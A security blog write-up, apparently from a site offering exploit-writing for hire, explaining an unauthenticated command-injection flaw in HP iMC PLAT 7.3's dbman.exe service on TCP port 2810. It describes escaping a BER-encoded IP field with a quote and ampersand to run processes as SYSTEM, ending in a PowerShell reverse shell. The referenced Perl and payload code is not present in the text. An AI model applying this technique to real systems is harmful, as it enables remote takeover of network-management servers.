Hey there, hope you're enjoying oxasploits! Need a secure server setup, code review, vulnerability assessment, or a general technical consultation? You can hire me!
Background
The dbman.exe module out of HP iMC PLAT 7.3 listening on TCP/2810 tries to initiate a restart of some network services, whilst doing so running NET STOP on an asn.1 BER encoded ip address. Because of multiple vulnerabilities within dbman, you can pass a string (BER encoded with dummy credentials) that is not properly sanitized (detected as an, and only an, ip address). This leaves us to simply close the quote and escape into being able to fork off any process we want using &. It is important to note that authentication with dbman is not required to exploit this vulnerability.
Note: If you would like to hire me to write an exploit, or assess a codebase for vulnerabilities, click here
PoC
The fist problem was generating the opcode and asn.1 allocation size dynamically. This can be done with pack and sprintf in perl:
The problem needing a little more effort was figuring out what asn.1 BER encoded data it will accept. We know it’s asn.1 BER because we can see the calls to the decoding function in ollydbg. After trying for days with online BER encoding tools (BER is very dynamic, so getting the data+scheme was a bit problematic), finally it was back to the drawing board and generated it from perl like so:
So now we have:
Which will generate our payload, which can be as simple as calc.exe. It’s important to note that when calc pops, it will be running as SYSTEM, which is likely not your GUI user… but that’s good for our purposes.
Exploitation
From here, it’s as simple as plugging in the reverse shell code to $payload. Note: This payload only works if KB976932 service pack and DotNetFix 4.5 are installed on the exploited host because of powershell requirements.
I ran it through a little data2c_hex.sh program, and added some spaces to get alignment correct.
Which leave us with the final weaponized version:
SYSTEM level powershell reverse acheived. Game over.